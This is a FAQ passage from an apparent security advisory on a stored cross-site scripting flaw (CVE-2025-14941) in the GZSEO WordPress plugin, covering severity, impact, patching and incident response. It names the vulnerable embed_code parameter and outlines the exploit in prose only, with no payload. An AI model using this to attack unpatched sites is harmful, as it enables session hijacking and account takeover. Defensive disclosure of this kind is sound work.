To mitigate this vulnerability, update the GZSEO plugin to version 2.0.12 or later, where the vulnerability has been patched by implementing proper capability checks and improving input sanitization.
What does the CVSS score of 6.4 indicate?
Understanding the risk level
A CVSS score of 6.4 indicates a medium severity level, suggesting that while exploitation requires authentication, the impact of successful exploitation can be significant, including potential data theft or site defacement.
What are the potential consequences of this vulnerability?
Impact of exploitation
Successful exploitation can lead to stored XSS, allowing attackers to execute arbitrary JavaScript in the context of other users. This can result in session hijacking, account takeovers, or unauthorized actions performed on behalf of victims.
How does the proof of concept demonstrate the issue?
Understanding the provided exploit
The proof of concept outlines a method for an authenticated attacker to exploit the vulnerability by sending a crafted AJAX request to the vulnerable endpoint, injecting malicious code into the embed_code parameter, which is then executed when the post is viewed.
What are AJAX handlers in this context?
Role of AJAX in the vulnerability
AJAX handlers are server-side functions that process asynchronous requests in WordPress. In this case, the GZSEO plugin’s AJAX handlers lack proper capability checks, allowing unauthorized actions to be performed by authenticated users.
Is there a way to mitigate the risk if I cannot update immediately?
Temporary measures
If immediate updates are not possible, consider restricting access to the GZSEO plugin’s settings to only trusted users, and monitor user activity for any suspicious behavior until the plugin can be updated.
What should I do if I suspect my site has been compromised?
Response to potential exploitation
If you suspect exploitation, immediately review your site’s content for unauthorized changes, change passwords for all user accounts, and consider restoring from a clean backup. Additionally, update the GZSEO plugin as soon as possible.
Where can I find more information on this vulnerability?
Resources for further reading
Detailed information about CVE-2025-14941 can be found in the official CVE database, security advisories from WordPress, and the plugin’s changelog, which outlines the changes made in the patched version.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations